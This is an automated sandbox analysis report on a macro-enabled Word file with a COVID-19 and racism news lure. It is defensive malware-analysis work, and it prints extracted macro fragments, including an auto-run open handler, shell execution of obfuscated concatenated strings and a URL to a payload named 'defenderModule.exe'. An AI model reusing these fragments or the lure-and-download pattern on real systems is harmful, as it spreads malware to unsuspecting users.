Analysis Report Medica negra morre covid-19 apos racismo.docm

Overview

General Information

Sample Name: Medica negra morre covid-19 apos racismo.docm
Analysis ID: 334232
MD5: 549943fa268b65fee546e7adda0f06ba
SHA1: 0ffc18af6916d88bf456f32a2e85b85e56b6c109
SHA256: c221dc10d175c2f3fb8366ad3aada1cf06c74ad8483a4a67bf62a0702b41c6f5
Tags: COVID-19, docm, geo, Outlook, PRT

Errors
  • Corrupt sample or wrongly selected analyzer.

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document contains an embedded VBA with many string operations indicating source code obfuscation
Machine Learning detection for sample
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 5544 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Machine Learning detection for sample
Source: Medica negra morre covid-19 apos racismo.docm, Joe Sandbox ML: detected
Source: winword.exe, Memory has grown: Private usage: 0MB later: 79MB
Source: vbaProject.bin, String found in binary or memory: https://bitbucket.org/seveca-emilia/onemoreslave/downloads/defenderModule.exe

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, False
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: WshShell.Run "firefox.exe sample.html", 1, False
    Set objAdminIS = CreateObject("Microsoft.ISAdm")
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: ws2asd.exec (str1 + str2 + str3 + str)
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo n
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: folder = Left(Wscript.ScriptFullName, InStrRev(Wscript.ScriptFullName, "\"))
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Set Shell = CreateObject("Wscript.Shell")
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "DHCP Records"
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Date: " & arrDHCPRecord(1)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Time: " & arrDHCPRecord(2)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & arrDHCPRecord(3)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "IP Address: " & arrDHCPRecord(4)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Host Name: " & arrDHCPRecord(5)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docm, OLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Source: Medica negra morre covid-19 apos racismo.docmStream path 'VBA/ThisDocument' : found possibly 'ADODB.Stream' functions loadfromfile, open, read, readtext, savetofile, write, writetext
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function charset, found possibly 'ADODB.Stream' functions loadfromfile, open, read
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function CheckValidUtf8, found possibly 'ADODB.Stream' functions loadfromfile, open, read
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Source: Medica negra morre covid-19 apos racismo.docmStream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, exec, expandenvironmentstrings, regread, run, environ
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open
Source: Medica negra morre covid-19 apos racismo.docmOLE indicator, VBA macros: true
Source: Medica negra morre covid-19 apos racismo.docmOLE indicator has summary info: false
Source: Medica negra morre covid-19 apos racismo.docmOLE indicator application name: unknown
Source: classification engineClassification label: mal68.expl.evad.winDOCM@1/8@0/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{B3962497-6F20-462A-88C9-1FC5FC57EB8A} - OProcSessId.dat
Source: Medica negra morre covid-19 apos racismo.docmOLE document summary: title field not present or empty
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.ini
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWindow found: window name: SysTabControl32
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEAutomated click: OK
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: Medica negra morre covid-19 apos racismo.docm | Stream path 'VBA/ThisDocument' : High number of string operations
Source: VBA code instrumentation | OLE, VBA macro, High number of string operations: Module ThisDocument
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting 62 | Path Interception | Extra Window Memory Injection 1 | Masquerading 1 | OS Credential Dumping | File and Directory Discovery 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting 62 | LSASS Memory | System Information Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information 1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Extra Window Memory Injection 1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
Medica negra morre covid-19 apos racismo.docm | 100% | Joe Sandbox ML | |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs


Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                        high
                                                                                                                        https://ncus-000.contentsync.8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://login.windows.net/common/oauth2/authorize8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                high
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://contentstorage.omex.office.net/addinclassifier/officeentities8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v28CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.com8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devices8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://directory.services.8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://login.windows-ppe.net/common/oauth2/authorize8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://loki.delve.office.com/api/v1/configuration/officewin32/8CE411D0-944A-475F-831C-DB1313AF15FE.0.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      No contacted IP infos

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:334232
                                                                                                                                                      Start date:27.12.2020
                                                                                                                                                      Start time:09:04:15
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 8m 48s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:Medica negra morre covid-19 apos racismo.docm
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:39
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • GSI enabled (VBA)
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal68.expl.evad.winDOCM@1/8@0/0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .docm
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Unable to detect Microsoft Word
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WinStore.App.exe, RuntimeBroker.exe, Microsoft.Photos.exe, backgroundTaskHost.exe, ApplicationFrameHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted)
                                                                                                                                                      • Excluded domains from analysis (whitelisted)
                                                                                                                                                      Errors:
                                                                                                                                                      • Corrupt sample or wrongly selected analyzer.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      No context

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      No context

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\8CE411D0-944A-475F-831C-DB1313AF15FE
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):130397
                                                                                                                                                      Entropy (8bit):5.3770089976764535
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:5cQceNgrA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:kmQ9DQW+zBX8P
                                                                                                                                                      MD5:2B6BDFA22720901B1294CC30233EB43D
                                                                                                                                                      SHA1:DA5F4AEDCC7CC82F08BE93C4BFE80866FF1D050C
                                                                                                                                                      SHA-256:A4A8EBAE629AE88DF47455C05B5F67F76969ED5FB844E9F82F225CE8D26C94C5
                                                                                                                                                      SHA-512:4F024F32982A16F9703285D6ACF44833F84A99094118B7EF283C5FB9ABB5D996A4433FC2D4E3EDDC52FF83906ABDB0D6FD6FEB0B31E423B994DC9DC34BB38CC8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
